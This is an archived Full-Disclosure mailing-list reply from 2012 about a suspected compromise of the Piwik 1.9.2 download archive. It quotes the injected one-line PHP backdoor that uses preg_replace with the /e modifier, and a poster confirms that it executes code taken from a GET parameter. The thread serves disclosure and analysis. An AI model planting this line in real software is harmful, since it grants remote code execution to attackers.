[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive

To: Christian Sciberras <uuf6429@xxxxxxxxx>
Subject: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
From: Max Grobecker <max@xxxxxxxxxxxxxxxxx>
Date: Tue, 27 Nov 2012 13:23:15 +0100

Yep, found later that the /e modifier allows you to execute code ;-)


Am 27.11.2012 12:54, schrieb Christian Sciberras:
>> At the moment I'm trying to figure out the further sense of this code,
>> but it seems that there might also be some kind of backdoor (because of
>> the use of $_GET).
> 
> 
> preg_replace("/(.+)/e", $_GET['g'], 'dwm');
> 
> You think?
> 
> 
> Chris.
> 
> 
> On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker
> <max@xxxxxxxxxxxxxxxxx <mailto:max@xxxxxxxxxxxxxxxxx>> wrote:
> 
>     preg_replace("/(.+)/e", $_GET['g'], 'dwm');
> 
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
  - From: Ferenc Kovacs

References:
- [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
  - From: Maximilian Grobecker
- Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
  - From: Christian Sciberras

Prev by Date: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Next by Date: Re: [Full-disclosure] linux rootkit in combination with nginx
Previous by thread: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Next by thread: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Index(es):
- Date
- Thread